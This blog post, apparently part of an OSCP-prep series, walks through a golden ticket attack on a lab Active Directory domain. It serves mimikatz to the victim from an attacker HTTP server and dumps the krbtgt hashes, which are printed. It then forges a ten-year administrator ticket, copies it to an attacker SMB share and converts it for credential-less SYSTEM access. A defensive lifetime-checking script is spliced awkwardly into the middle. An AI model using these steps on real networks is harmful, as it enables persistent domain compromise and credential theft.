
Friday, October 8, 2021

Active Directory CORPORATIVE.domain.local Series[IX] : GoldenTicket

 Hi everyone!


So far so good! In this post I'm going to show how to attack Active Directory directly on the Domain Controller by obtaining a golden ticket. This kind of attack targets the KDC (Key Distribution Center) on the Domain Controller to obtain a ticket that gives us full persistence with administrative privileges for ten years.




This attack must be performed with administrator privileges on the Windows Active Directory domain.

1. EXPLOITATION:

    1.1 SHARE MIMIKATZ 

        kali@kali:~/Descargas/x64$ python3 -m http.server 8989
        Serving HTTP on 0.0.0.0 port 8989 (http://0.0.0.0:8989/) ...
        10.0.2.17 - - [19/Sep/2021 23:53:05] "GET /mimikatz.exe HTTP/1.1" 200 -
        10.0.2.17 - - [19/Sep/2021 23:53:05] "GET /mimikatz.exe HTTP/1.1" 200 -



    1.2 OBTAIN MIMIKATZ BINARY

        C:\Users\worker2\golden_ticket>certutil.exe -urlcache -f http://10.0.2.19:8989/mimikatz.exe mimikatz.exexe
****  En línea  ****
CertUtil: -URLCache comando completado correctamente.

C:\Users\worker2\golden_ticket>dir
 El volumen de la unidad C no tiene etiqueta.
 El número de serie del volumen es: BE72-396A

 Directorio de C:\Users\worker2\golden_ticket

20/09/2021  17:05    <DIR>          .
20/09/2021  17:05    <DIR>          ..
20/09/2021  17:05         1.355.680 mimikatz.exexe
               1 archivos      1.355.680 bytes
               2 dirs   3.095.617.536 bytes libres




C:\Users\worker2\golden_ticket>

PS C:\Users\Administrador> .\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # lsadump::lsa /inject /name:krbtgt
Domain : CORPORATIVE / S-1-5-21-2048228633-4105951457-1013245227

RID  : 000001f6 (502)
User : krbtgt

 * Primary
    NTLM : 74b9c26e436d8ceacd2db129dbed8091
    LM   :
  Hash NTLM: 74b9c26e436d8ceacd2db129dbed8091
    ntlm- 0: 74b9c26e436d8ceacd2db129dbed8091
    lm  - 0: 0b85525f2bc07e8ddad5bc5116cda6be


 * Kerberos
    Default Salt : CORPORATIVE.DOMAIN.LOCALkrbtgt
    Credentials
      des_cbc_md5       : 46a25ef4f8cbec0d

 * Kerberos-Newer-Keys
    Default Salt : CORPORATIVE.DOMAIN.LOCALkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 178c2ad109c08f5f1396f956f899e65c8e3ca03e77ea180584e5b0c5ed5cd25e
      aes128_hmac       (4096) : 84edbefb34b31b613865a44d4bf66e05
      des_cbc_md5       (4096) : 46a25ef4f8cbec0d

 * NTLM-Strong-NTOWF
    Random Value : f155a5de1b36973934e6291d7cc9c252


Generate golden ticket (KIRBI):

mimikatz # kerberos::golden /user:Administrador /domain:CORPORATIVE.DOMAIN.local /sid:S-1-5-21-2048228633-4105951457-1013245227 /krbtgt:74b9c26e436d8ceacd2db129dbed8091 /ticket:ticket
User      : Administrador
Domain    : CORPORATIVE.DOMAIN.local (CORPORATIVE)
SID       : S-1-5-21-2048228633-4105951457-1013245227
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 74b9c26e436d8ceacd2db129dbed8091 - rc4_hmac_nt
Lifetime  : 20/09/2021 16:52:13 ; 18/09/2031 16:52:13 ; 18/09/2031 16:52:13
-> Ticket : ticket

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

List the ticket file:

mimikatz # kerberos::list

[00000000] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 20/09/2021 16:42:45 ; 21/09/2021 2:42:45 ; 27/09/2021 16:42:45
   Server Name       : krbtgt/CORPORATIVE.DOMAIN.LOCAL @ CORPORATIVE.DOMAIN.LOCAL
   Client Name       : Administrador @ CORPORATIVE.DOMAIN.LOCAL
   Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
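From the defender's side, the most visible trait of the forged ticket above is its lifetime: the legitimate TGT in the listing lives 10 hours and renews for 7 days, while the golden ticket was generated with a 10-year window. The following script is an added example (not from the original post or from mimikatz) that parses lines in the "Start/End/MaxRenew" format shown above and flags tickets that exceed the domain's Kerberos policy; the policy values are the stock AD defaults and are an assumption to adjust per domain.

```python
import re
from datetime import datetime, timedelta

# Assumed policy limits: the stock AD Kerberos policy issues TGTs valid
# for at most 10 hours, renewable for at most 7 days. Adjust per domain.
MAX_TICKET_LIFETIME = timedelta(hours=10)
MAX_RENEW_LIFETIME = timedelta(days=7)

# Matches the "Start/End/MaxRenew: start ; end ; renew" line format.
LIFETIME_RE = re.compile(
    r"Start/End/MaxRenew:\s*(?P<start>[\d/]+ [\d:]+)\s*;\s*"
    r"(?P<end>[\d/]+ [\d:]+)\s*;\s*(?P<renew>[\d/]+ [\d:]+)"
)


def parse_ts(value):
    # Timestamps are day/month/year, hours may be a single digit (e.g. "2:42:45").
    return datetime.strptime(value, "%d/%m/%Y %H:%M:%S")


def check_ticket(line):
    """Return a list of findings for one lifetime line (empty list = within policy)."""
    m = LIFETIME_RE.search(line)
    if not m:
        return ["unparseable lifetime line"]
    start, end, renew = (parse_ts(m.group(k)) for k in ("start", "end", "renew"))
    findings = []
    if end - start > MAX_TICKET_LIFETIME:
        findings.append(f"ticket lifetime {end - start} exceeds policy max {MAX_TICKET_LIFETIME}")
    if renew - start > MAX_RENEW_LIFETIME:
        findings.append(f"renew window {renew - start} exceeds policy max {MAX_RENEW_LIFETIME}")
    return findings


def scan(lines):
    """Map line index -> findings for every ticket that violates policy."""
    results = {}
    for i, line in enumerate(lines):
        findings = check_ticket(line)
        if findings:
            results[i] = findings
    return results


# Constructed sample: line 0 mirrors the legitimate TGT listed above,
# line 1 mirrors the Lifetime the forged ticket was generated with (10 years).
SAMPLE_LISTING = [
    "Start/End/MaxRenew: 20/09/2021 16:42:45 ; 21/09/2021 2:42:45 ; 27/09/2021 16:42:45",
    "Start/End/MaxRenew: 20/09/2021 16:52:13 ; 18/09/2031 16:52:13 ; 18/09/2031 16:52:13",
]

if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_LISTING).items():
        print(f"ticket {idx}: " + "; ".join(findings))
```

A forger can also choose a policy-conforming lifetime, so this check complements rather than replaces the standard mitigation of resetting the krbtgt password twice after a suspected compromise.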


Share an SMB folder (smbfolder) from the Kali attacker machine:



 and copy the ticket into it:

C:\Users\Administrador>copy ticket \\10.0.2.19\smbfolder\

        1 archivo(s) copiado(s).


    1.3 GOLDEN TICKET (CCACHE):

Run the ticketer.py tool to obtain a ccache file:

 


List Ccache file:
root@kali:/home/kali/Master/lab4/test/data# ls -ltrh f0ns1*
-rw-r--r-- 1 root root 1,1K sep 27 20:54 f0ns1.ccache

 

Export the environment variable:
export KRB5CCNAME='f0ns1.ccache'

 

Access as user f0ns1 with NT AUTHORITY\SYSTEM privileges, without supplying credentials:


And that's all for this last Active Directory attack. I hope you enjoyed my ninth Windows entry and that you'll follow my blog [https://roadtooscp-f0ns1.blogspot.com/]. We'll keep in touch.
